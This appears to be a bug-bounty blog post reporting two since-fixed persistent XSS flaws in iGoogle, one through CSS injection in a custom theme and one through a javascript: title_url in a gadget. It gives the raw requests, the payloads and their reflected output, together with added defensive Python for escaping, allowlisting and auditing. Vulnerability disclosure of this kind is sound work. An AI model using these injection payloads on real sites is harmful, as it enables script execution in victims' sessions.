Hacking Google – Part 2
Posted by Kos on 12/16/2010 at 8:52 am | Last modified: 11/08/2011 6:05 pm
Vulnerability: Cross Site Scripting
Affects: any browser that allows JavaScript to be executed from CSS. IE6, IE7, and the latest version of Opera were tested.
iGoogle (http://www.google.com/ig) was vulnerable to persistent XSS via CSS injection on a custom theme.
POST /ig/skin_submit_xhr?tmprivacy=1&et=4cdb0f0bQKHcNSc5&referrer=tm HTTP/1.1
{"title":"test","author":"test","description":"","skin":
[{"background_image":"');}body{background-image:expression(alert(document.domain));
-o-link:'javascript:alert(document.domain)';-o-link-source:current}/*","logo_color":"white","logo_hex_color":"FFFFFF",
"background_color":"D1ECF9","gadget_border":"6685b8","gadget_top_background":"6685b8",
"gadget_top_text":"CEECFC","tab_background":"D1ECF9","tab_border":"93BDD1",
"tab_text":"3A5787","selected_text":"3A5787","gadget_icon":"00a9ff","icon_color":"00a9ff"}]}
How it’s reflected on the page:
When the iGoogle page loads, the payload fires immediately if the tab the theme is attached to is the selected one.
If that tab is not selected, the payload fires as soon as the user selects it.
GET /ig/skin_xml_to_css?hl=en&gl=us&v2=1&url=http://www.google.com/ig/tm%3Foutput%3Dxml%26te%3DFYvZBahVsoU&skindx=ix:0&fp=lUTDcevwYRs HTTP/1.1
....');}body{background-image:expression(alert(document.domain));-o-link:'javascript:alert(document.domain)';
-o-link-source:current}@import 'data:,*{x:expression(alert(document.domain))}';/*') no-repeat top center;}/* google logo */....
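The injection works because the theme's background_image value is dropped into a url('...') declaration as-is, so a single quote and a closing parenthesis end the string and the rule, and everything after them is parsed as new CSS. The following is an added example (my code, not Google's, and not the skin_xml_to_css implementation) of how a server generating a stylesheet from user-supplied theme values can stay safe: only absolute http(s) URLs are accepted for the image, accepted values are still CSS-escaped so no character can leave the string literal, and a small audit function flags the constructs shown in the write-up (plus two legacy script-in-CSS vectors of the same family) in stored skins. The function names and the benign example.com URL are my own; the malicious value is the one from the POST body above.

```python
import re
from urllib.parse import urlsplit

# Constructed sample values: the first is the background_image string from the
# write-up's POST body, the second a benign theme image URL (example.com).
MALICIOUS_BG = ("');}body{background-image:expression(alert(document.domain));"
                "-o-link:'javascript:alert(document.domain)';-o-link-source:current}/*")
BENIGN_BG = "https://example.com/themes/sky.png"

# Characters allowed to pass into a CSS string literal unescaped. Everything
# else (quotes, parentheses, braces, semicolons, backslashes, whitespace, ...)
# becomes a CSS hex escape, so it can never terminate url('...') or the rule.
_CSS_PLAIN = re.compile(r"[A-Za-z0-9\-_.~:/?#&=%+,@]")


def css_string_escape(value: str) -> str:
    """Escape a value for use inside a single-quoted CSS string."""
    out = []
    for ch in value:
        if _CSS_PLAIN.fullmatch(ch):
            out.append(ch)
        else:
            # CSS escape: backslash, hex code point, terminating space.
            out.append(f"\\{ord(ch):x} ")
    return "".join(out)


def is_http_url(value: str) -> bool:
    """Accept only absolute http(s) URLs with a host and no control characters."""
    if any(ord(ch) < 0x20 or ch.isspace() for ch in value):
        return False
    parts = urlsplit(value)
    return parts.scheme in ("http", "https") and bool(parts.netloc)


def background_image_declaration(value: str) -> str:
    """Build the background-image declaration for a theme value.

    Anything that is not an http(s) URL is replaced by 'none' (fail closed);
    accepted URLs are still escaped so their characters cannot leave the string.
    """
    if not is_http_url(value):
        return "background-image: none;"
    return f"background-image: url('{css_string_escape(value)}') no-repeat top center;"


# Constructs the write-up shows being smuggled into the generated stylesheet,
# plus the legacy IE 'behavior:' and Firefox '-moz-binding' vectors, which
# belong to the same class. Useful for auditing skins already in storage.
_DANGEROUS_CSS = re.compile(
    r"expression\s*\(|javascript\s*:|-o-link|@import|behavior\s*:|-moz-binding",
    re.IGNORECASE,
)


def audit_skin(skin: dict) -> list:
    """Return (field, matched text) pairs for every suspicious value in a skin."""
    findings = []
    for field, value in skin.items():
        if isinstance(value, str):
            for m in _DANGEROUS_CSS.finditer(value):
                findings.append((field, m.group(0)))
    return findings


if __name__ == "__main__":
    skin = {"background_image": MALICIOUS_BG, "logo_color": "white"}
    print(background_image_declaration(MALICIOUS_BG))
    print(background_image_declaration(BENIGN_BG))
    print(audit_skin(skin))
```

Rejecting non-URL values outright is deliberate: a theme image has no legitimate reason to be anything but an http(s) URL, so an allowlist is simpler to reason about than trying to strip individual dangerous tokens from free-form CSS. The escaping step remains as a second layer for URLs that legitimately contain quotes or parentheses.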
The Danger
A user can share a tab with other users via invitation. If the victim accepts the tab invitation, then the theme with the attached malicious CSS will be added to their page.
Resolution
This issue was resolved in about a week.
Tags: bounty, google, xss | Categories: Hacking, XSS
Hacking Google – Part 1
Posted by Kos on at 8:51 am | Last modified: 11/08/2011 6:05 pm
Vulnerability: Cross Site Scripting
Affects: all browsers.
iGoogle (http://www.google.com/ig) was vulnerable to persistent XSS via untrusted gadgets hosted on offsite domains.

<ModulePrefs author="Kyle" author_email=""
description="__MSG_description__" thumbnail="http://www.google.com/images/firefox/sprite2.png"
screenshot="http://www.google.com/images/firefox/sprite2.png"
title_url="javascript:alert(document.domain);" title="[TITLE OF GADGET]" height="165">
<Require feature="setprefs" />
<Require feature="views" />
<Require feature="dynamic-height" />
....
</ModulePrefs>
How it’s reflected on the page:
.... <a id="m_8_url" href="javascript:alert(document.domain);" target="_blank"><span id="m_8_title">[TITLE OF GADGET]</span></a> .... (The "Hax" string below is the title of the gadget, which is what the reflected link above displays.)

Resolution
This issue was resolved very quickly.
Google now replaces any title_url whose scheme is not http or https with the directory the gadget file is hosted in.
If the file is hosted at http://attacker.com/path/to/file.xml, the URL becomes http://attacker.com/path/to/.
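The fix described above is a scheme allowlist with a safe fallback rather than a blocklist of bad schemes. As an added example (my code, not Google's), the snippet below implements that behaviour: a title_url is kept only when it is an absolute http(s) URL with a host, and anything else (javascript:, data:, a scheme-relative //host URL, an empty string) is replaced by the hosting directory of the gadget XML, then rendered into an anchor of the shape shown reflected above with attribute escaping. The function names are my own; requiring a host as well as the scheme is slightly stricter than the write-up states, and the attacker.com path is the one from the text.

```python
import html
from urllib.parse import urlsplit, urlunsplit

# Constructed sample values taken from the write-up: the gadget spec URL and
# the title_url the gadget author supplied.
GADGET_URL = "http://attacker.com/path/to/file.xml"
INJECTED_TITLE_URL = "javascript:alert(document.domain);"


def hosting_directory(gadget_url: str) -> str:
    """Return the directory the gadget XML is served from, with a trailing slash."""
    parts = urlsplit(gadget_url)
    directory = parts.path.rsplit("/", 1)[0] + "/"
    return urlunsplit((parts.scheme, parts.netloc, directory, "", ""))


def sanitize_title_url(title_url: str, gadget_url: str) -> str:
    """Keep title_url only when it is an absolute http(s) URL with a host.

    Any other value (javascript:, data:, vbscript:, scheme-relative //host,
    empty string, odd casing or embedded whitespace) falls back to the
    gadget's hosting directory, which is the replacement the write-up describes.
    urlsplit() lower-cases the scheme, so 'JaVaScRiPt:' is handled too.
    """
    parts = urlsplit(title_url)
    if parts.scheme in ("http", "https") and parts.netloc:
        return title_url
    return hosting_directory(gadget_url)


def render_title_link(module_id: int, title: str, title_url: str, gadget_url: str) -> str:
    """Render the gadget title anchor in the shape the write-up shows reflected."""
    href = sanitize_title_url(title_url, gadget_url)
    # Escape both values for an attribute/text context so a title or URL
    # containing quotes or angle brackets cannot break out of the markup.
    return (
        f'<a id="m_{module_id}_url" href="{html.escape(href, quote=True)}" target="_blank">'
        f'<span id="m_{module_id}_title">{html.escape(title)}</span></a>'
    )


if __name__ == "__main__":
    print(render_title_link(8, "[TITLE OF GADGET]", INJECTED_TITLE_URL, GADGET_URL))
    print(render_title_link(8, "Weather", "https://example.com/weather", GADGET_URL))
```

The fallback is derived from the gadget's own URL rather than from the submitted value, so a rejected title_url contributes nothing to the output; the author of the gadget ends up linking to a location they already control, which is exactly what the original href was allowed to do.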